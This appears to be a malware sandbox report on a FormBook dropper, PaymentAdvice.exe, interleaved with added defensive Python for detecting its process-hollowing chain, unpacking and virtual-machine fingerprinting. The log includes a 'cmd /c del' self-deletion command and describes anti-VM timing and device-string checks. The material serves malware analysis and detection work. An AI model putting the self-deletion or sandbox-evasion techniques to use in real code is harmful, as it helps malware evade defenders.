          Source: 2.2.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 2.2.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 2.1.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 2.1.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 0.2.PaymentAdvice.exe.2680000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 0.2.PaymentAdvice.exe.2680000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@13/10
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 0_2_004041E5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 0_2_004020A6 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:844:120:WilError_01
          Source: C:\Users\user\Desktop\PaymentAdvice.exeFile created: C:\Users\user\AppData\Local\Temp\nsj41C3.tmpJump to behavior
          Source: PaymentAdvice.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\PaymentAdvice.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\PaymentAdvice.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: PaymentAdvice.exeVirustotal: Detection: 32%
          Source: PaymentAdvice.exeReversingLabs: Detection: 25%
          Source: C:\Users\user\Desktop\PaymentAdvice.exeFile read: C:\Users\user\Desktop\PaymentAdvice.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\PaymentAdvice.exe 'C:\Users\user\Desktop\PaymentAdvice.exe'
          Source: C:\Users\user\Desktop\PaymentAdvice.exeProcess created: C:\Users\user\Desktop\PaymentAdvice.exe 'C:\Users\user\Desktop\PaymentAdvice.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PaymentAdvice.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PaymentAdvice.exeProcess created: C:\Users\user\Desktop\PaymentAdvice.exe 'C:\Users\user\Desktop\PaymentAdvice.exe'
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PaymentAdvice.exe'
          Source: C:\Users\user\Desktop\PaymentAdvice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: msiexec.pdb source: PaymentAdvice.exe, 00000002.00000002.278128222.000000000073A000.00000004.00000020.sdmp
          Source: Binary string: msiexec.pdbGCTL source: PaymentAdvice.exe, 00000002.00000002.278128222.000000000073A000.00000004.00000020.sdmp
          Source: Binary string: C:\xampp\htdocs\Cryptor\78a9904c70914141b6b07ca4fbdcf1ff\Loader\Loader\Release\u58v4wo87.pdb source: PaymentAdvice.exe, 00000000.00000002.238262176.0000000073CA2000.00000002.00020000.sdmp, ic4muy4.dll.0.dr
          Source: Binary string: wntdll.pdbUGP source: PaymentAdvice.exe, 00000000.00000003.229993167.000000001F100000.00000004.00000001.sdmp, PaymentAdvice.exe, 00000002.00000002.278191881.00000000009D0000.00000040.00000001.sdmp, msiexec.exe, 00000007.00000002.502133269.0000000004610000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PaymentAdvice.exe, msiexec.exe
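The process-creation rows above are the whole FormBook launch chain in five lines: the dropper re-launches its own image and hollows the child, the payload migrates into the already-running explorer.exe, the shell spawns a bare msiexec.exe to host the final stage, and that msiexec.exe erases the dropper through cmd /c del. The following is an added example of how a detection engineer would encode that chain as rules over process-creation telemetry; it is not part of the Joe Sandbox report. The event records are constructed from the rows above, the rule names and the HOLLOW_TARGETS set are my own, and the command-line splitter is hand-rolled because shlex in POSIX mode treats the backslashes in Windows paths as escape characters.

```python
"""Triage rules for the 'Process created' chain in the report above (added example)."""
from __future__ import annotations

import ntpath
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent: str   # image path of the creating process; "unknown" for the sandbox's root launch
    image: str    # image path of the created process
    cmdline: str  # command line as logged, argv[0] included


# Constructed from the report's process-creation rows.
SAMPLE_EVENTS = [
    ProcEvent("unknown", r"C:\Users\user\Desktop\PaymentAdvice.exe",
              r"'C:\Users\user\Desktop\PaymentAdvice.exe'"),
    ProcEvent(r"C:\Users\user\Desktop\PaymentAdvice.exe", r"C:\Users\user\Desktop\PaymentAdvice.exe",
              r"'C:\Users\user\Desktop\PaymentAdvice.exe'"),
    # explorer.exe is never *created* here: FormBook injects into the running shell,
    # so the injection only shows up as the shell's unexpected child.
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\SysWOW64\msiexec.exe",
              r"C:\Windows\SysWOW64\msiexec.exe"),
    ProcEvent(r"C:\Windows\SysWOW64\msiexec.exe", r"C:\Windows\SysWOW64\cmd.exe",
              r"C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PaymentAdvice.exe'"),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\System32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

# Images the hollowed payload is hosted in; msiexec.exe is what this report shows (assumption: extend from your own telemetry).
HOLLOW_TARGETS = {"msiexec.exe"}


def split_cmdline(cmdline: str) -> list[str]:
    """Whitespace-split a logged Windows command line, honouring ' and " quoting; backslashes are kept."""
    tokens: list[str] = []
    cur: list[str] = []
    quote = None
    for ch in cmdline:
        if quote:
            if ch == quote:
                quote = None
            else:
                cur.append(ch)
        elif ch in "'\"":
            quote = ch
        elif ch.isspace():
            if cur:
                tokens.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        tokens.append("".join(cur))
    return tokens


def _base(path: str) -> str:
    return ntpath.basename(path).lower()


def _args(event: ProcEvent) -> list[str]:
    """Arguments after argv[0]; argv[0] is dropped only when it names the created image."""
    argv = split_cmdline(event.cmdline)
    return argv[1:] if argv and _base(argv[0]) == _base(event.image) else argv


def triage_process_chain(events: list[ProcEvent]) -> list[tuple[str, str]]:
    """Return (rule, detail) pairs for the hollowing and self-deletion pattern in the rows above."""
    findings: list[tuple[str, str]] = []
    # Root launch(es) of the analysis: a later 'del' of one of these is the dropper erasing itself.
    roots = {e.image.lower() for e in events if e.parent == "unknown"}
    for e in events:
        args = _args(e)
        # 1. A process re-launching its own image with no arguments: the set-up for
        #    hollowing a suspended copy of itself (process 0 -> process 2 above).
        if e.parent.lower() == e.image.lower() and not args:
            findings.append(("self_relaunch", e.image))
        # 2. The shell starting a hollowing target with an empty command line. A user
        #    double-clicking an .msi yields 'msiexec.exe /i <package>', not a bare image path.
        if _base(e.parent) == "explorer.exe" and _base(e.image) in HOLLOW_TARGETS and not args:
            findings.append(("shell_spawned_hollow_target", e.image))
        # 3. 'cmd /c del <root sample>' issued by a system binary: self-deletion by proxy,
        #    so the dropper is gone from disk once the payload is resident.
        if (_base(e.image) == "cmd.exe" and len(args) >= 3
                and args[0].lower() == "/c" and args[1].lower() == "del"
                and args[2].lower() in roots):
            findings.append(("proxy_self_delete", f"{e.parent} -> del {args[2]}"))
    return findings


if __name__ == "__main__":
    for rule, detail in triage_process_chain(SAMPLE_EVENTS):
        print(f"{rule:28} {detail}")
```

Rule 2 is the one worth alerting on by itself: explorer.exe creating a SysWOW64 LOLBin with nothing but its own path as the command line has no benign explanation, and it fires before the del that destroys the sample.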

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Unpacked PE file: 2.2.PaymentAdvice.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_0041D047 push esp; ret
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_0041C9DA push cs; ret
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00415326 push esi; iretd
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_0041B3F2 push eax; ret
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_0041B3FB push eax; ret
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_0041B3A5 push eax; ret
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_0041CBB8 push esp; ret
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_0041B45C push eax; ret
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_0041CC3C push esp; ret
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_0041C4C5 push ss; ret
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_0041CCCB push esp; ret
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_0041CD5D push esp; ret
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_0041CF9B push esp; ret
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A4D0D1 push ecx; ret
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_1_0041D047 push esp; ret
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_1_0041C9DA push cs; ret
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_1_00415326 push esi; iretd
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_1_0041B3F2 push eax; ret
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_1_0041B3FB push eax; ret
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_1_0041B3A5 push eax; ret
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_1_0041CBB8 push esp; ret
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_1_0041B45C push eax; ret
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_1_0041CC3C push esp; ret
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_1_0041C4C5 push ss; ret
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_1_0041CCCB push esp; ret
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_1_0041CD5D push esp; ret
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0468D0D1 push ecx; ret
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0039D047 push esp; ret
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0039C9DA push cs; ret
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_00395326 push esi; iretd
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0039CBB8 push esp; ret
Source: C:\Users\user\Desktop\PaymentAdvice.exe | File created: C:\Users\user\AppData\Local\Temp\nse41F3.tmp\ic4muy4.dll
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
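The "Detected unpacking" row compares the section table of the file on disk (.text, .rdata, .data, .ndata and .rsrc; .ndata is the section NSIS installers carry, consistent with the nsj/nse temp files and the dropped DLL) with the image dumped from process 2 at 0x400000, which has only an executable .text. The following added example, not the sandbox's own logic, decodes the section Characteristics into the E/R/W notation the row uses and diffs two tables the way the signature does; it also flags writable-and-executable sections, the other thing worth checking on a dumped image. Both headers are constructed with the builder at the bottom, so only the fields the parser reads are populated; the rendering prints every bit, so the report's abbreviated ".data:W" comes out as "RW" here.

```python
"""Decode PE section rights and diff an on-disk section table against a memory dump (added example)."""
from __future__ import annotations

import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_CNT_UNINITIALIZED_DATA = 0x00000080
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def section_rights(image: bytes) -> dict[str, str]:
    """Map section name -> rights string, E/R/W in that order."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE\\0\\0 signature")
    # COFF header follows the signature: NumberOfSections at +6, SizeOfOptionalHeader at +20,
    # and the section table starts right after the optional header.
    (nsections,) = struct.unpack_from("<H", image, e_lfanew + 6)
    (opt_size,) = struct.unpack_from("<H", image, e_lfanew + 20)
    table = e_lfanew + 24 + opt_size
    rights: dict[str, str] = {}
    for i in range(nsections):
        # IMAGE_SECTION_HEADER is 40 bytes: 8-byte name, 28 bytes of sizes/pointers, Characteristics last.
        name, chars = struct.unpack_from("<8s28xI", image, table + 40 * i)
        flags = ""
        if chars & IMAGE_SCN_MEM_EXECUTE:
            flags += "E"
        if chars & IMAGE_SCN_MEM_READ:
            flags += "R"
        if chars & IMAGE_SCN_MEM_WRITE:
            flags += "W"
        rights[name.rstrip(b"\0").decode("ascii", "replace")] = flags
    return rights


def rights_diff(on_disk: dict[str, str], dumped: dict[str, str]) -> dict[str, tuple[str | None, str | None]]:
    """Sections whose rights differ or that exist on only one side: a runtime unpacker's fingerprint."""
    return {name: (on_disk.get(name), dumped.get(name))
            for name in sorted(set(on_disk) | set(dumped))
            if on_disk.get(name) != dumped.get(name)}


def wx_sections(rights: dict[str, str]) -> list[str]:
    """Sections mapped both writable and executable; compilers do not emit these, unpacker stubs do."""
    return [name for name, r in rights.items() if "W" in r and "E" in r]


def build_pe_header(sections: list[tuple[bytes, int]]) -> bytes:
    """Construct a minimal PE32 header around the given (name, Characteristics) table.
    Only what section_rights() reads is populated; the optional header is zero-filled."""
    e_lfanew, opt_size = 0x40, 0xE0
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    table = b"".join(struct.pack("<8sIIIIIIHHI", name, 0, 0, 0, 0, 0, 0, 0, 0, chars)
                     for name, chars in sections)
    return dos + b"PE\0\0" + coff + b"\0" * opt_size + table


# Constructed to mirror the report's row: the NSIS table on disk versus a dump with only .text.
DISK_HEADER = build_pe_header([
    (b".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (b".rdata", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
    (b".data", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    (b".ndata", IMAGE_SCN_CNT_UNINITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    (b".rsrc", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
])
DUMP_HEADER = build_pe_header([
    (b".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
])

if __name__ == "__main__":
    disk, dump = section_rights(DISK_HEADER), section_rights(DUMP_HEADER)
    for name, (before, after) in rights_diff(disk, dump).items():
        print(f"{name:8} {before or '-':4} -> {after or '-'}")
```

On a real dump the section headers may themselves have been rewritten by the unpacker, so treat the table as a hint and confirm the rights with the page protections of the mapped region (VirtualQueryEx or the sandbox's memory map) rather than the header alone.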

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\PaymentAdvice.exe | RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PaymentAdvice.exe | RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msiexec.exe | RDTSC instruction interceptor: First address: 00000000003885E4 second address: 00000000003885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msiexec.exe | RDTSC instruction interceptor: First address: 000000000038896E second address: 0000000000388974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PaymentAdvice.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_004088A0 rdtsc
Source: C:\Windows\explorer.exe TID: 6536 | Thread sleep time: -55000s >= -30000s
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6392 | Thread sleep time: -48000s >= -30000s
Source: C:\Windows\explorer.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 0_2_004026BC FindFirstFileA,
Source: explorer.exe, 00000003.00000000.264236200.000000000891C000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000003.00000000.263844021.0000000008270000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000003.00000000.264236200.000000000891C000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000002.506521767.0000000003767000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000003.00000000.254877403.00000000053A0000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
Source: explorer.exe, 00000003.00000002.512492029.00000000053BD000.00000004.00000001.sdmp | Binary or memory string: @%SystemRoot%\System32\mswsock.dll,-60101-9%SystemRoot%\system32\mswsock.dlle6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&
Source: explorer.exe, 00000003.00000002.496017525.00000000011B3000.00000004.00000020.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000003.00000000.264288916.00000000089B5000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000003.00000000.263844021.0000000008270000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000003.00000002.512526929.00000000053D7000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000003.00000000.263844021.0000000008270000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000003.00000000.264288916.00000000089B5000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: explorer.exe, 00000003.00000000.263844021.0000000008270000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
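The virtual-machine evidence in the rows above is the PnP device naming, not the Hyper-V sentences: those read like Windows' own Host Compute Service message text resident in explorer.exe, whereas the "File opened / queried" probe and the device strings carry the vendor and product tokens (Ven_NECVMWar, Prod_VMware_SATA_CD00, Ven_VMware, Ven_Msft with Prod_Virtual_DVD-ROM) that a hypervisor's emulated storage advertises. The following added example, not part of the report, is a parser for both forms those strings take, the device instance path (SCSI\Device&Ven_X&Prod_Y\instance) and the device interface path (\\?\SCSI#Device&Ven_X&Prod_Y#instance#{interface-class GUID}, the same id with '\' swapped for '#' and the interface class appended), plus a classifier that names the hypervisor from the vendor token. The sample paths are copied from the rows above with the memory-dump noise trimmed; the VENDOR_MARKERS table is mine and includes VirtualBox and QEMU entries this report does not show.

```python
"""Parse PnP storage device paths and name the hypervisor they betray (added example)."""
from __future__ import annotations

from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class PnpDevice:
    enumerator: str                 # bus enumerator, e.g. SCSI
    kind: str                       # device class token, e.g. CdRom or Disk
    vendor: str                     # Ven_ field
    product: str                    # Prod_ field
    instance: str                   # instance id, e.g. 5&280b647&0&000000
    interface_class: Optional[str]  # GUID suffix of an interface path, else None


def parse_device_path(path: str) -> PnpDevice:
    """Accept a device instance path or a device interface path; see the lead-in for the two layouts."""
    p = path[4:] if path.startswith("\\\\?\\") else path
    iface = None
    if "#" in p:
        head, _, tail = p.rpartition("#")
        if tail.startswith("{") and tail.endswith("}"):
            iface, p = tail[1:-1].lower(), head
        p = p.replace("#", "\\")
    parts = p.split("\\")
    if len(parts) != 3:
        raise ValueError(f"unexpected device path layout: {path!r}")
    enumerator, device_id, instance = parts
    kind, *fields = device_id.split("&")
    vendor = product = ""
    for field in fields:
        key, _, value = field.partition("_")   # Ven_NECVMWar -> ("Ven", "NECVMWar")
        if key.lower() == "ven":
            vendor = value
        elif key.lower() == "prod":
            product = value
    return PnpDevice(enumerator.upper(), kind, vendor, product, instance, iface)


# Vendor token prefix -> hypervisor (assumption: my table, matched case-insensitively).
# 'Msft' only counts together with a 'Virtual' product, which is how Hyper-V's
# synthetic storage presents itself; a physical Microsoft device would not match.
VENDOR_MARKERS = {
    "necvmwar": "VMware",
    "vmware": "VMware",
    "msft": "Hyper-V",
    "vbox": "VirtualBox",
    "qemu": "QEMU/KVM",
}


def hypervisor_for(dev: PnpDevice) -> Optional[str]:
    vendor = dev.vendor.lower()
    for marker, name in VENDOR_MARKERS.items():
        if vendor.startswith(marker):
            if marker == "msft" and "virtual" not in dev.product.lower():
                return None
            return name
    return None


def vm_artifacts(paths: list[str]) -> dict[str, list[str]]:
    """hypervisor -> the device ids that gave it away; strings that are not device paths are skipped."""
    found: dict[str, list[str]] = {}
    for path in paths:
        try:
            dev = parse_device_path(path)
        except ValueError:
            continue
        name = hypervisor_for(dev)
        if name:
            found.setdefault(name, []).append(f"{dev.enumerator}\\{dev.kind} {dev.vendor} {dev.product}")
    return found


# Constructed from the report's rows (trailing dump noise removed).
SAMPLE_PATHS = [
    r"SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}",
    r"\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}",
    r"SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000",
    r"SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000",
]

if __name__ == "__main__":
    for hv, ids in vm_artifacts(SAMPLE_PATHS).items():
        print(hv, ids)
```

The defensive reading of the same code: if your sandbox's storage still reports these vendor and product tokens, the cheapest anti-VM check in the sample already wins, so patch the device naming before worrying about the RDTSC timing checks above.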
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\msiexec.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_004088A0 rdtsc
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00409B10 LdrLoadDll,
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 0_2_73CA1000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,GetMessageA,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 0_2_02671664 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 0_2_0267187C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A220A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A220A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A220A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A220A0 mov eax, dword ptr fs:[00000030h]
